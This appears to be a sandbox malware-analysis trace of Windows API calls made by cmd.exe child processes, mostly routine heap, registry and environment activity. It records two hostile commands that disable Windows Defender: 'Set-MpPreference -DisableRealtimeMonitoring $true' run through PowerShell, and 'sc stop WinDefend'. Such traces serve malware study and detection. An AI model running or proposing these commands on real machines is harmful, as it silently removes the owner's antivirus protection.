	[0055.754] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x0, Size=0x14) returned 0x362f78
	[0055.754] FindClose (in: hFindFile=0x362f38 | out: hFindFile=0x362f38) returned 1
	[0055.754] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.COM", fInfoLevelId=0x1, lpFindFileData=0x18ee40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ee40) returned 0xffffffff
	[0055.754] GetLastError () returned 0x2
	[0055.754] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.EXE", fInfoLevelId=0x1, lpFindFileData=0x18ee40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ee40) returned 0x362f38
	[0055.755] GetProcessHeap () returned 0x350000
	[0055.755] RtlReAllocateHeap (Heap=0x350000, Flags=0x0, Ptr=0x362f78, Size=0x4) returned 0x362f78
	[0055.755] FindClose (in: hFindFile=0x362f38 | out: hFindFile=0x362f38) returned 1
	[0055.755] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3
	[0055.755] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2
	[0055.755] GetConsoleTitleW (in: lpConsoleTitle=0x18f338, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0055.755] InitializeProcThreadAttributeList (in: lpAttributeList=0x18f1c0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x18f288 | out: lpAttributeList=0x18f1c0, lpSize=0x18f288) returned 1
	[0055.755] UpdateProcThreadAttribute (in: lpAttributeList=0x18f1c0, dwFlags=0x0, Attribute=0x60001, lpValue=0x18f280, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x18f1c0, lpPreviousValue=0x0) returned 1
	[0055.755] GetStartupInfoW (in: lpStartupInfo=0x18f17c | out: lpStartupInfo=0x18f17c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) 
	[0055.755] GetProcessHeap () returned 0x350000
	[0055.755] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x18) returned 0x362f38
	[0055.755] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38
	[0055.755] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2
	[0055.755] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2
	[0055.755] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0055.755] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3
	[0055.755] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3
	[0055.755] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3
	[0055.755] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5
	[0055.755] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5
	[0055.755] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9
	[0055.755] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9
	[0055.755] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11
	[0055.755] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12
	[0055.755] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13
	[0055.756] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13
	[0055.756] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0055.756] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0055.756] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0055.756] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0055.756] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0055.756] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0055.756] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13
	[0055.756] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13
	[0055.756] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13
	[0055.756] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16
	[0055.756] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16
	[0055.756] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17
	[0055.756] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17
	[0055.756] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18
	[0055.756] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18
	[0055.756] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18
	[0055.756] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20
	[0055.756] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20
	[0055.756] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20
	[0055.756] GetProcessHeap () returned 0x350000
	[0055.756] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x362f38 | out: hHeap=0x350000) returned 1
	[0055.756] GetProcessHeap () returned 0x350000
	[0055.756] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0xa) returned 0x35d620
	[0055.756] lstrcmpW (lpString1="\\powershell.exe", lpString2="\\XCOPY.EXE") returned -1
	[0055.757] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpCommandLine="powershell  Set-MpPreference -DisableRealtimeMonitoring $true", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x18f21c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="powershell  Set-MpPreference -DisableRealtimeMonitoring $true", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18f268 | out: lpCommandLine="powershell  Set-MpPreference -DisableRealtimeMonitoring $true", lpProcessInformation=0x18f268*(hProcess=0x50, hThread=0x4c, dwProcessId=0x81c, dwThreadId=0x114)) returned 1
	[0055.760] CloseHandle (hObject=0x4c) returned 1
	[0055.760] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1
	[0055.760] GetProcessHeap () returned 0x350000
	[0055.760] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x361df0 | out: hHeap=0x350000) returned 1
	[0055.760] GetEnvironmentStringsW () returned 0x361df0*
	[0055.760] GetProcessHeap () returned 0x350000
	[0055.760] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x942) returned 0x3604f0
	[0055.760] FreeEnvironmentStringsW (penv=0x361df0) returned 1
	[0055.760] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0
	[0065.100] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x18f15c | out: lpExitCode=0x18f15c*=0x1) returned 1
	[0065.101] CloseHandle (hObject=0x50) returned 1
	[0065.101] _vsnwprintf (in: _Buffer=0x18f2a4, _BufferCount=0x13, _Format="%08X", _ArgList=0x18f168 | out: _Buffer="00000001") returned 8
	[0065.101] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000001") returned 1
	[0065.101] GetProcessHeap () returned 0x350000
	[0065.101] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x3604f0 | out: hHeap=0x350000) returned 1
	[0065.101] GetEnvironmentStringsW () returned 0x362f88*
	[0065.101] GetProcessHeap () returned 0x350000
	[0065.101] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x968) returned 0x3604f0
	[0065.101] FreeEnvironmentStringsW (penv=0x362f88) returned 1
	[0065.101] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1
	[0065.101] GetProcessHeap () returned 0x350000
	[0065.101] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x3604f0 | out: hHeap=0x350000) returned 1
	[0065.101] GetEnvironmentStringsW () returned 0x362f88*
	[0065.101] GetProcessHeap () returned 0x350000
	[0065.101] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x968) returned 0x3604f0
	[0065.101] FreeEnvironmentStringsW (penv=0x362f88) returned 1
	[0065.101] GetProcessHeap () returned 0x350000
	[0065.102] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x35d620 | out: hHeap=0x350000) returned 1
	[0065.102] DeleteProcThreadAttributeList (in: lpAttributeList=0x18f1c0 | out: lpAttributeList=0x18f1c0) 
	[0065.102] _get_osfhandle (_FileHandle=1) returned 0x7
	[0065.102] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
	[0065.102] _get_osfhandle (_FileHandle=1) returned 0x7
	[0065.102] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a8541ac | out: lpMode=0x4a8541ac) returned 1
	[0065.102] _get_osfhandle (_FileHandle=0) returned 0x3
	[0065.102] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a8541b0 | out: lpMode=0x4a8541b0) returned 1
	[0065.102] SetConsoleInputExeNameW () returned 0x1
	[0065.102] GetConsoleOutputCP () returned 0x1b5
	[0065.102] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a854260 | out: lpCPInfo=0x4a854260) returned 1
	[0065.102] SetThreadUILanguage (LangId=0x0) returned 0x409
	[0065.102] exit (_Code=1) 

Process:
	id = "17"
	image_name = "cmd.exe"
	filename = "c:\\windows\\system32\\cmd.exe"
	page_root = "0x7ee17720"
	os_pid = "0xfd8"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "15"
	os_parent_pid = "0xfac"
	cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /c sc stop WinDefend"
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "ZGW5TDPU\\2XC7u663GxWc"
	bitness = "64"
	os_groups = "ZGW5TDPU\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ece3" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 54
	os_tid = 0xfdc

	[0055.540] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2bfd50 | out: lpSystemTimeAsFileTime=0x2bfd50*(dwLowDateTime=0xc5e7de0, dwHighDateTime=0x1d50a6a)) 
	[0055.540] GetCurrentProcessId () returned 0xfd8
	[0055.540] GetCurrentThreadId () returned 0xfdc
	[0055.540] GetTickCount () returned 0xa666ff
	[0055.540] QueryPerformanceCounter (in: lpPerformanceCount=0x2bfd48 | out: lpPerformanceCount=0x2bfd48*=12937850504) returned 1
	[0055.541] GetModuleHandleA (lpModuleName=0x0) returned 0x4a830000
	[0055.542] __set_app_type (_Type=0x1) 
	[0055.542] __p__fmode () returned 0x770231f4
	[0055.542] __p__commode () returned 0x770231fc
	[0055.542] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a8521a6) returned 0x0
	[0055.542] __getmainargs (in: _Argc=0x4a854238, _Argv=0x4a854240, _Env=0x4a85423c, _DoWildCard=0, _StartInfo=0x4a854140 | out: _Argc=0x4a854238, _Argv=0x4a854240, _Env=0x4a85423c) returned 0
	[0055.542] GetCurrentThreadId () returned 0xfdc
	[0055.542] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xfdc) returned 0x38
	[0055.542] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76b10000
	[0055.542] GetProcAddress (hModule=0x76b10000, lpProcName="SetThreadUILanguage") returned 0x76b624c2
	[0055.542] SetThreadUILanguage (LangId=0x0) returned 0x409
	[0055.542] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
	[0055.543] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2bfce0 | out: phkResult=0x2bfce0*=0x0) returned 0x2
	[0055.543] VirtualQuery (in: lpAddress=0x2bfd17, lpBuffer=0x2bfcb0, dwLength=0x1c | out: lpBuffer=0x2bfcb0*(BaseAddress=0x2bf000, AllocationBase=0x1c0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0055.543] VirtualQuery (in: lpAddress=0x1c0000, lpBuffer=0x2bfcb0, dwLength=0x1c | out: lpBuffer=0x2bfcb0*(BaseAddress=0x1c0000, AllocationBase=0x1c0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c
	[0055.543] VirtualQuery (in: lpAddress=0x1c1000, lpBuffer=0x2bfcb0, dwLength=0x1c | out: lpBuffer=0x2bfcb0*(BaseAddress=0x1c1000, AllocationBase=0x1c0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c
	[0055.543] VirtualQuery (in: lpAddress=0x1c3000, lpBuffer=0x2bfcb0, dwLength=0x1c | out: lpBuffer=0x2bfcb0*(BaseAddress=0x1c3000, AllocationBase=0x1c0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0055.543] VirtualQuery (in: lpAddress=0x2c0000, lpBuffer=0x2bfcb0, dwLength=0x1c | out: lpBuffer=0x2bfcb0*(BaseAddress=0x2c0000, AllocationBase=0x2c0000, AllocationProtect=0x2, RegionSize=0x101000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c
	[0055.543] GetConsoleOutputCP () returned 0x1b5
	[0055.543] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a854260 | out: lpCPInfo=0x4a854260) returned 1
	[0055.543] SetConsoleCtrlHandler (HandlerRoutine=0x4a84e72a, Add=1) returned 1
	[0055.543] _get_osfhandle (_FileHandle=1) returned 0x7
	[0055.543] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1
	[0055.543] _get_osfhandle (_FileHandle=1) returned 0x7
	[0055.543] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a8541ac | out: lpMode=0x4a8541ac) returned 1
	[0055.544] _get_osfhandle (_FileHandle=1) returned 0x7
	[0055.544] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
	[0055.544] _get_osfhandle (_FileHandle=0) returned 0x3
	[0055.544] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a8541b0 | out: lpMode=0x4a8541b0) returned 1
	[0055.544] _get_osfhandle (_FileHandle=0) returned 0x3
	[0055.544] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1
	[0055.544] GetEnvironmentStringsW () returned 0x460250*
	[0055.544] GetProcessHeap () returned 0x450000
	[0055.544] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x8fa) returned 0x460b58
	[0055.545] FreeEnvironmentStringsW (penv=0x460250) returned 1
	[0055.545] GetProcessHeap () returned 0x450000
	[0055.545] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x4) returned 0x4600d0
	[0055.545] GetEnvironmentStringsW () returned 0x460250*
	[0055.545] GetProcessHeap () returned 0x450000
	[0055.545] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x8fa) returned 0x461460
	[0055.545] FreeEnvironmentStringsW (penv=0x460250) returned 1
	[0055.545] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2bec50 | out: phkResult=0x2bec50*=0x40) returned 0x0
	[0055.545] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2bec58, lpData=0x2bec5c, lpcbData=0x2bec54*=0x1000 | out: lpType=0x2bec58*=0x0, lpData=0x2bec5c*=0x0, lpcbData=0x2bec54*=0x1000) returned 0x2
	[0055.545] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2bec58, lpData=0x2bec5c, lpcbData=0x2bec54*=0x1000 | out: lpType=0x2bec58*=0x4, lpData=0x2bec5c*=0x1, lpcbData=0x2bec54*=0x4) returned 0x0
	[0055.545] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2bec58, lpData=0x2bec5c, lpcbData=0x2bec54*=0x1000 | out: lpType=0x2bec58*=0x0, lpData=0x2bec5c*=0x1, lpcbData=0x2bec54*=0x1000) returned 0x2
	[0055.545] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2bec58, lpData=0x2bec5c, lpcbData=0x2bec54*=0x1000 | out: lpType=0x2bec58*=0x4, lpData=0x2bec5c*=0x0, lpcbData=0x2bec54*=0x4) returned 0x0
	[0055.545] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2bec58, lpData=0x2bec5c, lpcbData=0x2bec54*=0x1000 | out: lpType=0x2bec58*=0x4, lpData=0x2bec5c*=0x40, lpcbData=0x2bec54*=0x4) returned 0x0
	[0055.545] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2bec58, lpData=0x2bec5c, lpcbData=0x2bec54*=0x1000 | out: lpType=0x2bec58*=0x4, lpData=0x2bec5c*=0x40, lpcbData=0x2bec54*=0x4) returned 0x0
	[0055.545] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2bec58, lpData=0x2bec5c, lpcbData=0x2bec54*=0x1000 | out: lpType=0x2bec58*=0x0, lpData=0x2bec5c*=0x40, lpcbData=0x2bec54*=0x1000) returned 0x2
	[0055.545] RegCloseKey (hKey=0x40) returned 0x0
	[0055.545] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2bec50 | out: phkResult=0x2bec50*=0x40) returned 0x0
	[0055.546] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2bec58, lpData=0x2bec5c, lpcbData=0x2bec54*=0x1000 | out: lpType=0x2bec58*=0x0, lpData=0x2bec5c*=0x40, lpcbData=0x2bec54*=0x1000) returned 0x2
	[0055.546] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2bec58, lpData=0x2bec5c, lpcbData=0x2bec54*=0x1000 | out: lpType=0x2bec58*=0x4, lpData=0x2bec5c*=0x1, lpcbData=0x2bec54*=0x4) returned 0x0
	[0055.546] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2bec58, lpData=0x2bec5c, lpcbData=0x2bec54*=0x1000 | out: lpType=0x2bec58*=0x0, lpData=0x2bec5c*=0x1, lpcbData=0x2bec54*=0x1000) returned 0x2
	[0055.546] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2bec58, lpData=0x2bec5c, lpcbData=0x2bec54*=0x1000 | out: lpType=0x2bec58*=0x4, lpData=0x2bec5c*=0x0, lpcbData=0x2bec54*=0x4) returned 0x0
	[0055.546] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2bec58, lpData=0x2bec5c, lpcbData=0x2bec54*=0x1000 | out: lpType=0x2bec58*=0x4, lpData=0x2bec5c*=0x9, lpcbData=0x2bec54*=0x4) returned 0x0
	[0055.546] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2bec58, lpData=0x2bec5c, lpcbData=0x2bec54*=0x1000 | out: lpType=0x2bec58*=0x4, lpData=0x2bec5c*=0x9, lpcbData=0x2bec54*=0x4) returned 0x0
	[0055.546] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2bec58, lpData=0x2bec5c, lpcbData=0x2bec54*=0x1000 | out: lpType=0x2bec58*=0x0, lpData=0x2bec5c*=0x9, lpcbData=0x2bec54*=0x1000) returned 0x2
	[0055.546] RegCloseKey (hKey=0x40) returned 0x0
	[0055.546] time (in: timer=0x0 | out: timer=0x0) returned 0x5cdadf3a
	[0055.546] srand (_Seed=0x5cdadf3a) 
	[0055.546] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c sc stop WinDefend"
	[0055.546] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c sc stop WinDefend"
	[0055.546] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a855260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0055.546] GetProcessHeap () returned 0x450000
	[0055.546] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x210) returned 0x461d68
	[0055.547] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x461d70, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b
	[0055.547] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a860640, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87
	[0055.547] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a860640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0055.547] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a860640, nSize=0x2000 | out: lpBuffer="") returned 0x0
	[0055.547] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13
	[0055.547] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11
	[0055.547] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13
	[0055.547] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13
	[0055.547] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12
	[0055.547] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4
	[0055.547] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2
	[0055.547] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8
	[0055.547] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1
	[0055.547] GetProcessHeap () returned 0x450000
	[0055.547] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x460b58 | out: hHeap=0x450000) returned 1
	[0055.547] GetEnvironmentStringsW () returned 0x460250*
	[0055.547] GetProcessHeap () returned 0x450000
	[0055.547] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x912) returned 0x4628a0
	[0055.548] FreeEnvironmentStringsW (penv=0x460250) returned 1
	[0055.548] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a860640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b
	[0055.548] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a860640, nSize=0x2000 | out: lpBuffer="") returned 0x0
	[0055.548] _wcsicmp (_String1="KEYS", _String2="CD") returned 8
	[0055.548] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6
	[0055.548] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8
	[0055.548] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8
	[0055.548] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7
	[0055.548] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9
	[0055.548] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7
	[0055.548] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3
	[0055.548] GetProcessHeap () returned 0x450000
	[0055.548] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x30) returned 0x4600e0
	[0055.548] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2bfa1c | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0055.548] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x104, lpBuffer=0x2bfa1c, lpFilePart=0x2bfa18 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x2bfa18*="system32") returned 0x13
	[0055.548] GetFileAttributesW (lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32")) returned 0x10
	[0055.548] FindFirstFileW (in: lpFileName="C:\\Windows", lpFindFileData=0x2bf798 | out: lpFindFileData=0x2bf798*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa191445, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x8797820, ftLastAccessTime.dwHighDateTime=0x1d4d67f, ftLastWriteTime.dwLowDateTime=0x8797820, ftLastWriteTime.dwHighDateTime=0x1d4d67f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0x4507f0
	[0055.549] FindClose (in: hFindFile=0x4507f0 | out: hFindFile=0x4507f0) returned 1
	[0055.549] FindFirstFileW (in: lpFileName="C:\\Windows\\system32", lpFindFileData=0x2bf798 | out: lpFindFileData=0x2bf798*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb15659b, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x3a13b080, ftLastAccessTime.dwHighDateTime=0x1d4d68e, ftLastWriteTime.dwLowDateTime=0x3a13b080, ftLastWriteTime.dwHighDateTime=0x1d4d68e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System32", cAlternateFileName="")) returned 0x4507f0
	[0055.549] FindClose (in: hFindFile=0x4507f0 | out: hFindFile=0x4507f0) returned 1
	[0055.549] GetFileAttributesW (lpFileName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 0x10
	[0055.549] SetCurrentDirectoryW (lpPathName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 1
	[0055.549] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Windows\\System32") returned 1
	[0055.549] GetProcessHeap () returned 0x450000
	[0055.549] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4628a0 | out: hHeap=0x450000) returned 1
	[0055.549] GetEnvironmentStringsW () returned 0x460250*
	[0055.549] GetProcessHeap () returned 0x450000
	[0055.549] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x942) returned 0x461f80
	[0055.549] FreeEnvironmentStringsW (penv=0x460250) returned 1
	[0055.549] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a855260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0055.549] GetProcessHeap () returned 0x450000
	[0055.549] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4600e0 | out: hHeap=0x450000) returned 1
	[0055.549] GetProcessHeap () returned 0x450000
	[0055.549] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x400e) returned 0x463b10
	[0055.550] GetProcessHeap () returned 0x450000
	[0055.550] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x30) returned 0x4600e0
	[0055.550] GetProcessHeap () returned 0x450000
